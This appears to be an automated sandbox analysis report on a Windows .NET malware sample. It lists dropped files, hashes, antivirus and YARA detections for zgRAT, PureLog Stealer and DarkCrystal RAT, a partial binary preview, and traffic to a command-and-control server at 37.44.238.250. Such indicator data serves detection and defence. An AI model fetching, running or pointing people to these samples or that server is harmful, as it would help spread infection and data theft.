                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):22016
                                                                                                            Entropy (8bit):5.41854385721431
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (673), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):673
                                                                                                            Entropy (8bit):5.883826806883822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:70XXDrAs2fsEe3htd2n8JJm0nQVtxxUr8E1cgx3u2EndbokcjOh/sNoZGat/nk+g:UXDrJ2ivkn8bXgRndb5Rh/3rebqo6tg
                                                                                                            MD5:326BAB8ADC2594C92F1FE4E92F50B5A5
                                                                                                            SHA1:3FDB7079E9BEB9A7459E57B19E14B561E1CE29F0
                                                                                                            SHA-256:9D206F6F30A22385C4C8C922B65BFEAD58AD57EB00E1E2ACDF45DCB6B12B63AD
                                                                                                            SHA-512:1B5BF72DB343E751F0109703B1436D06A751AC19A17A9D32670A0D0AE8CFE6511FFFD3C6FC86C134EF9C8ED3BD6C5D5AE7708B4890B5D0C69CFABFE8EE56C121
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):23552
                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):33792
                                                                                                            Entropy (8bit):5.541771649974822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32256
                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32256
                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):22016
                                                                                                            Entropy (8bit):5.41854385721431
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):297
                                                                                                            Entropy (8bit):5.795993681281262
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:+6nGd30TXdLQ6NRgVN/ArzyxhjUIBtBHZI2f1Ho2dv3Bnqe2WoSpIE1n:c0Ttk6NRgVZSexCIBtB5I29Ho2ZB+amI
                                                                                                            MD5:39FFCE830DF28DF4A8C95F5ECB3845FC
                                                                                                            SHA1:DFAA05530D13A524A837522861C9B760F43B65BF
                                                                                                            SHA-256:CE8F886016915AE8DA93735FF2698A8193697A9A4FDDAFF784F901DA753ECE64
                                                                                                            SHA-512:EC974F57E6BEC8C2256A53A813AB9B5674AA3338C6D2009C116FB750A8A966440865676E4F0A053AFBBC73DE836CF38960A72A4C519BB6394416519BE371AD4F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:MSVC .res
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1224
                                                                                                            Entropy (8bit):4.435108676655666
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4608
                                                                                                            Entropy (8bit):3.9253244418792326
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:6PJTPt+M7Jt8Bs3FJsdcV4MKe27pJvqBH2OulajfqXSfbNtm:2PdPc+Vx9MpJvkQcjRzNt
                                                                                                            MD5:BEDC18432D05E76192578C7FBC551109
                                                                                                            SHA1:7DEE5828B62D1A82B3ACA4E79FC58925B61CD6DC
                                                                                                            SHA-256:D374CB6D54FC7398D5C9702C6341F65073D55E25730CD8073A399A89112F3C93
                                                                                                            SHA-512:E8BDA1452D295D130BFD0BD05C79C40D5CA769A6E9AC92EB3CC594BCFE5631CFC255E4FC24182AB2070F4C9AB8BE39A2CEC90846055A6FDB7469C640DA180BBF
                                                                                                            Malicious:true
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (862), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):862
                                                                                                            Entropy (8bit):5.900632170468396
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:EZb9oRLd6OMT5wxjwH9jmMS6uafbS+02acjb:EZRoRRMT5Ksxm16b3P7
                                                                                                            MD5:08B36935CDF2F7DFB73E7094E895BAC8
                                                                                                            SHA1:E1672818F02B48FFAE314015C3B51071742008B9
                                                                                                            SHA-256:0B725E9E0F26A7211DCF56C8B6D8682F289554909F50299BA5732DDF9BA30E78
                                                                                                            SHA-512:B0CC63CB3BEC1438956200834035DC956590CA72E0504D422E760E8E42B68340E24A96EF495A293924485B0190EB0E724353B7234CDDF5DFD38F505AF4DD7D05
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................. z..K....... ............................................................................ ............... ..H............text...tZ... ...\.................. ..`.rsrc... ............^..............@....reloc...............b..............@..B................Pz......H........... ....................y.......................................0..........(.... ........8........E........M...)...q...8....(.... ....~....{v...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z...*...0..)....... ........8........E................1...V.......8z.......~....(T...~....(X... ....<.... ....8.......... ....~....{....:....& ....8....~....:u... ....~....{|...9o...& ....8d...~....(L... .... .... ....s....~....(P....... ....~
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):151
                                                                                                            Entropy (8bit):4.904572590153658
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FXbbQbaLy6voe1J8XKvj:Vx993DEUGQuSeX
                                                                                                            MD5:BADC94ED73BD9C12D8C7213C594F51FA
                                                                                                            SHA1:D805650669C5C39FC70CA3011485C6DDAAFE27FF
                                                                                                            SHA-256:7441B0A2D292A0F0CF5C58598F1C7302EFE62AAE7F202E4E2A29D7F1F929434C
                                                                                                            SHA-512:2D1DE9E300DFC39DA451625653A736F76857D0B80A4B1DC69D0AE6479B97C75DC0AC427C46F8B508F2C965D15D6AF3008078A12D3FD3BB65283333D24D0F36CE
                                                                                                            Malicious:false
                                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/11/2024 19:49:53..19:49:53, error: 0x80072746.19:49:58, error: 0x80072746.
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:s5duotgoYD.exe
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5:b379f4ac167609d8a3ef26444098b61d
                                                                                                            SHA1:85fe0bbbe666d72a955ee98444415194e00739eb
                                                                                                            SHA256:430cba76bb21f0ff671a5345c15a51bd047b0f5aecf764ef4668ae9085d22b80
                                                                                                            SHA512:0028141132f1437ff556a00e7cd32298bf561690fd809f361fcfaf9b8837e5a173f4acb192b25668550e2ec526ea4a518ea46e3fd7c2e1b8fad1a49d8d6ed0fe
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            TLSH:B995AE1A56924E3BC360177185AB503E52A5C7767A72FB0B350F24E1AC037B5CFB22A7
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................
                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                            Entrypoint:0x5e7a6e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67261E11 [Sat Nov 2 12:41:53 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e7a20 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e8000 | 0x320 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1ea000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1e5a74 | 0x1e5c00 | 82da0ca20ed00e21358815d7423be636 | False | 0.7825135502444673 | data | 7.556185144032018 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1e8000 | 0x320 | 0x400 | 287f78eaac50746e5d3d25653ee25fee | False | 0.3525390625 | data | 2.651038093332615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1ea000 | 0xc | 0x200 | e891e37e2636106272d19c84a5f660b5 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1e8058 | 0x2c8 | data |  |  | 0.46207865168539325
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-12T00:42:17.538372+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49731 | 37.44.238.250 | 80 | TCP
2024-11-12T00:42:18.172405+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-12T00:43:01.129789+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.4 | 49791 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Nov 12, 2024 00:42:33.662370920 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.662520885 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:33.667347908 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.009813070 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.014652014 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.014676094 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.014688015 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.227639914 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.306623936 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.310503006 CET804975337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.494141102 CET4975380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.523298025 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.528117895 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.528213024 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.528309107 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.536092997 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.884875059 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:34.890003920 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.890142918 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:34.890151978 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.096375942 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.169240952 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.169442892 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.318273067 CET4975480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:35.325922012 CET804975437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:35.325977087 CET4975480192.168.2.437.44.238.250
